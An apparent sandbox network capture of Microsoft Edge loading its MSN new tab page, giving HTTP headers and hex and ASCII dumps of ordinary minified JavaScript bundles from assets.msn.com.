                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                  sec-ch-ua-full-version: "94.0.992.31"
                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                  downlink: 1.5
                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                  ect: 4g
                                                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                  Sec-Fetch-Mode: same-origin
                                                                                                                                                                  Sec-Fetch-Dest: worker
                                                                                                                                                                  Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
                                                                                                                                                                  2025-01-11 06:54:30 UTC1408INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Content-Length: 31123
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: A1HeHhArkxY7qYLgv0/anQ==
                                                                                                                                                                  Last-Modified: Fri, 10 Jan 2025 20:39:49 GMT
                                                                                                                                                                  ETag: 0x8DD31B6EDA6A832
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                  x-ms-request-id: ec03f19a-e01e-0098-549f-639b1c000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Akamai-Request-BC: [a=23.36.176.72,b=683974276,c=g,n=US_IL_ELKGROVEVILLAGE,o=20940],[c=c,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=2, clienttt; dur=16, origin; dur=0, cdntime; dur=16, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Miss from child, Hit from parent
                                                                                                                                                                  Akamai-Server-IP: 23.36.176.72
                                                                                                                                                                  Akamai-Request-ID: 28c49e84
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.48b02417.1736542488.28c49e84
                                                                                                                                                                  X-CID: 7
                                                                                                                                                                  X-CCC: US
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 5B95A991E07F4CAAB9A6D26A29329073 Ref B: CHI30EDGE0415 Ref C: 2025-01-11T06:54:30Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:29 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:30 UTC14976INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 29 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3b 65 6c 73 65 7b 76 61 72 20 72 3d 74 28 29 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 72 29 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 3a 65 29 5b 69 5d 3d 72 5b 69 5d 7d 7d 28 73 65 6c 66 2c 28 28 29 3d 3e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72
                                                                                                                                                                  Data Ascii: !function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var i in r)("object"==typeof exports?exports:e)[i]=r[i]}}(self,(()=>(()=>{"use strict";var
                                                                                                                                                                  2025-01-11 06:54:30 UTC16147INData Raw: 5f 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 67 65 74 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 28 22 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 22 29 29 7c 7c 31 2c 74 68 69 73 2e 5f 65 63 61 73 65 73 73 69 6f 6e 3d 74 68 69 73 2e 67 65 74 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 28 22 65 63 61 73 65 73 73 69 6f 6e 22 29 7c 7c 22 69 6e 69 74 22 2c 74 68 69 73 2e 5f 62 72 6f 77 73 65 72 4f 70 74 4f 75 74 3d 22 31 22 3d 3d 3d 74 68 69 73 2e 67 65 74 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 28 22 54 4f 70 74 4f 75 74 22 29 2c 74 68 69 73 2e 5f 64 69 73 61 62 6c 65 57 57 41 75 74 68 3d 22 31 22 3d 3d 3d 74 68 69 73 2e 67 65 74 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 28 22 64 69 73 61 62 6c 65 57 57
                                                                                                                                                                  Data Ascii: _devicePixelRatio=parseInt(this.getQueryParameter("devicePixelRatio"))||1,this._ecasession=this.getQueryParameter("ecasession")||"init",this._browserOptOut="1"===this.getQueryParameter("TOptOut"),this._disableWWAuth="1"===this.getQueryParameter("disableWW


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  3192.168.11.205216123.45.46.202443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC616OUTGET /bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.js HTTP/1.1
                                                                                                                                                                  Host: assets.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:30 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: VRff421ljxi2HJNBEW61bQ==
                                                                                                                                                                  Last-Modified: Tue, 07 Jan 2025 21:00:23 GMT
                                                                                                                                                                  ETag: 0x8DD2F5E4DF24BF2
                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                  x-ms-request-id: 4c08f139-901e-006a-3247-612a47000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Connection: Transfer-Encoding
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                  Akamai-Request-BC: [a=23.208.24.74,b=3495913665,c=g,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=118, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.208.24.74
                                                                                                                                                                  Akamai-Request-ID: d05f68c1
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.4a18d017.1736578470.d05f68c1
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  2025-01-11 06:54:30 UTC15145INData Raw: 30 30 30 30 42 44 30 32 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 38 30 65 37 31 32 37 36 66 31 62 65 63 35 63 62 39 65 36 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31
                                                                                                                                                                  Data Ascii: 0000BD02/*! For license information please see vendors.80e71276f1bec5cb9e6b.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
                                                                                                                                                                  2025-01-11 06:54:30 UTC16265INData Raw: 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28
                                                                                                                                                                  Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 55 53 54 4f 4d 5f 45 4c 45 4d 45 4e 54 5f 48 41 4e 44 4c 49 4e 47 26 26 64 65 28 65 2e 43 55 53 54 4f 4d 5f 45 4c 45 4d 45 4e 54 5f 48 41 4e 44 4c 49 4e 47 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 43 68 65 63 6b 29 26 26 28 5f 74 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 43 68 65 63 6b 3d 65 2e 43 55 53 54 4f 4d 5f 45 4c 45 4d 45 4e 54 5f 48 41 4e 44 4c 49 4e 47 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 43 68 65 63 6b 29 2c 65 2e 43 55 53 54 4f 4d 5f 45 4c 45 4d 45 4e 54 5f 48 41 4e 44 4c 49 4e 47 26 26 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 43 55 53 54 4f 4d 5f 45 4c 45 4d 45 4e 54 5f 48 41 4e 44 4c 49 4e 47 2e 61 6c 6c 6f 77 43 75 73 74 6f 6d 69 7a 65 64 42 75 69 6c 74 49 6e 45 6c 65 6d 65 6e 74 73 26 26 28 5f 74 2e 61 6c 6c 6f 77
                                                                                                                                                                  Data Ascii: USTOM_ELEMENT_HANDLING&&de(e.CUSTOM_ELEMENT_HANDLING.attributeNameCheck)&&(_t.attributeNameCheck=e.CUSTOM_ELEMENT_HANDLING.attributeNameCheck),e.CUSTOM_ELEMENT_HANDLING&&"boolean"==typeof e.CUSTOM_ELEMENT_HANDLING.allowCustomizedBuiltInElements&&(_t.allow
                                                                                                                                                                  2025-01-11 06:54:30 UTC604INData Raw: 6c 22 21 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 74 29 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 3d 6e 26 26 28 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 2c 5b 74 2c 65 5d 7d 28 74 2c 65 29 29 7d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 65 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 2e 61 70 70 6c 79 28 76 6f 69 64 20 30 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6e 2e 73 75 62 73 70 61 63 65 4f 70 74 69 6f
                                                                                                                                                                  Data Ascii: l"!=typeof e&&(e=t),"function"!==n&&(t=function(t){return t[e]}),[t,e]}(t,e))},A=function(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];return function(t){return function(){var n=t.apply(void 0,arguments);return n.subspaceOptio
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6f 3d 7b 49 4e 49 54 3a 22 40 40 72 65 64 75 78 2f 49 4e 49 54 22 2b 69 28 29 2c 52 45 50 4c 41 43 45 3a 22 40 40 72 65 64 75 78 2f 52 45 50 4c 41 43 45 22 2b 69 28 29 2c 50 52 4f 42 45 5f 55 4e 4b 4e 4f 57 4e 5f 41 43 54 49 4f 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 40 40 72 65 64 75 78 2f 50 52 4f 42 45 5f 55 4e 4b 4e 4f 57 4e 5f 41 43 54 49 4f 4e 22 2b 69 28 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 65 3d 74 3b 6e 75 6c 6c 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 3b 29 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50
                                                                                                                                                                  Data Ascii: 00004000o={INIT:"@@redux/INIT"+i(),REPLACE:"@@redux/REPLACE"+i(),PROBE_UNKNOWN_ACTION:function(){return"@@redux/PROBE_UNKNOWN_ACTION"+i()}};function u(t){if("object"!=typeof t||null===t)return!1;for(var e=t;null!==Object.getPrototypeOf(e);)e=Object.getP
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 6f 64 65 55 52 49 43 6f 6d 70 0d 0a
                                                                                                                                                                  Data Ascii: odeURIComp
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6f 6e 65 6e 74 29 2e 72 65 70 6c 61 63 65 28 2f 5b 28 29 5d 2f 67 2c 65 73 63 61 70 65 29 3b 76 61 72 20 75 3d 22 22 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 6f 29 6f 5b 63 5d 26 26 28 75 2b 3d 22 3b 20 22 2b 63 2c 21 30 21 3d 3d 6f 5b 63 5d 26 26 28 75 2b 3d 22 3d 22 2b 6f 5b 63 5d 2e 73 70 6c 69 74 28 22 3b 22 29 5b 30 5d 29 29 3b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 65 2e 77 72 69 74 65 28 69 2c 74 29 2b 75 7d 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 7b 73 65 74 3a 69 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 21 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                  Data Ascii: 00004000onent).replace(/[()]/g,escape);var u="";for(var c in o)o[c]&&(u+="; "+c,!0!==o[c]&&(u+="="+o[c].split(";")[0]));return document.cookie=t+"="+e.write(i,t)+u}}return Object.create({set:i,get:function(t){if("undefined"!=typeof document&&(!arguments
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 26 26 28 30 2c 69 2e 5a 29 28 0d 0a
                                                                                                                                                                  Data Ascii: &&(0,i.Z)(
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 39 46 34 42 0d 0a 74 2c 65 2c 6e 29 7d 2c 63 3d 6e 28 31 34 32 31 31 29 2c 61 3d 6e 28 37 37 34 30 38 29 2c 73 3d 6e 28 39 37 35 35 38 29 2c 66 3d 6e 28 33 32 32 39 31 29 2c 6c 3d 6e 28 31 37 32 35 37 29 2c 64 3d 6e 28 38 34 34 33 31 29 2c 70 3d 6e 28 39 32 31 37 30 29 2c 76 3d 6e 28 35 39 34 37 32 29 2c 68 3d 6e 28 36 32 32 34 36 29 2c 67 3d 6e 28 32 36 31 39 29 2c 6d 3d 6e 28 39 36 32 38 38 29 2c 79 3d 6e 28 34 34 31 39 39 29 2c 5a 3d 6e 28 37 30 37 37 30 29 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 28 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 21 3d 3d 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 5b 65 5d 29 26 26 22 5f 5f 70 72 6f 74 6f 5f 5f 22 21 3d 65 29 72 65 74 75 72 6e 20 74 5b 65 5d
                                                                                                                                                                  Data Ascii: 00009F4Bt,e,n)},c=n(14211),a=n(77408),s=n(97558),f=n(32291),l=n(17257),d=n(84431),p=n(92170),v=n(59472),h=n(62246),g=n(2619),m=n(96288),y=n(44199),Z=n(70770);var b=function(t,e){if(("constructor"!==e||"function"!=typeof t[e])&&"__proto__"!=e)return t[e]
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 72 6e 22 30 22 3d 3d 65 26 26 31 2f 74 3d 3d 2d 49 6e 66 69 6e 69 74 79 3f 22 2d 30 22 3a 65 7d 7d 2c 33 37 33 31 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 74 72 79 7b 72 65 74 75 72 6e 20 74 2b 22 22 7d 63 61 74 63 68 28 74 29 7b 7d 7d 72 65 74 75 72 6e 22 22 7d 7d 2c 32 35 32 34 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 2f 5c 73 2f 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                  Data Ascii: rn"0"==e&&1/t==-Infinity?"-0":e}},37311:function(t,e){"use strict";var n=Function.prototype.toString;e.Z=function(t){if(null!=t){try{return n.call(t)}catch(t){}try{return t+""}catch(t){}}return""}},25248:function(t,e){"use strict";var n=/\s/;e.Z=function(


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  4192.168.11.205286523.45.46.202443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC618OUTGET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1
                                                                                                                                                                  Host: assets.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:30 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: uNgSH4TlVfgPvcJyj5sBtQ==
                                                                                                                                                                  Last-Modified: Wed, 08 Jan 2025 20:48:39 GMT
                                                                                                                                                                  ETag: 0x8DD3025D488700A
                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                  x-ms-request-id: b88f42eb-e01e-0103-1927-624576000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Connection: Transfer-Encoding
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                  Akamai-Request-BC: [a=23.208.24.82,b=3069603041,c=g,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=118, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.208.24.82
                                                                                                                                                                  Akamai-Request-ID: b6f66ce1
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.5218d017.1736578470.b6f66ce1
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  2025-01-11 06:54:30 UTC15145INData Raw: 30 30 30 30 41 33 39 38 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 69 63 72 6f 73 6f 66 74 2e 37 66 63 33 31 30 39 37 36 39 33 39 30 65 30 66 37 39 31 32 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6d 69 63 72 6f 73 6f 66 74 22 5d 2c 7b 36 33 31 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76
                                                                                                                                                                  Data Ascii: 0000A398/*! For license information please see microsoft.7fc3109769390e0f7912.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return A}});v
                                                                                                                                                                  2025-01-11 06:54:30 UTC16290INData Raw: 36 2c 72 2e 62 24 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 6d 66 2c 6f 2e 6b 4a 2c 6f 2e 4b 6e 2c 6f 2e 6e 64 2c 72 2e 4d 46 2c 6f 2e 59 36 2c 72 2e 63 70 2c 73 2e 70 37 2c 73 2e 55 59 2c 6f 2e 6c 5f 2c 6c 2e 63 39 2c 6c 2e 49 62 2c 6f 2e 49 64 2c 6f 2e 72 57 2c 6f 2e 59 6d 2c 6f 2e 6f 38 2c 6f 2e 6c 65 2c 6f 2e 6e 72 2c 6f 2e 6d 66 2c 6f 2e 4b 6e 2c 6f 2e 4a 5f 2c 6f 2e 6b 4a 2c 6f 2e 56 5a 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 59 36 2c 6f 2e 74 4f 2c 6f 2e 55 41 2c 6f 2e 4d 72 2c 6f 2e 58 7a 2c 6f 2e 6e 64 2c 64 2e 70 75 2c 6f 2e 46 59 2c 6f 2e 6c 5f 2c 6c 2e 49 62 2c 6f 2e 6d 36 2c 72 2e 77 31 2c 61 2e 47 57 2c 61 2e 4a 6a 2c 75 2e 70 5a 2c 75 2e 61 7a 2c 75 2e 5f 6c 2c 75 2e 43 4e 2c 75 2e 46 36 2c 61 2e 44 4f 3b 66 75 6e
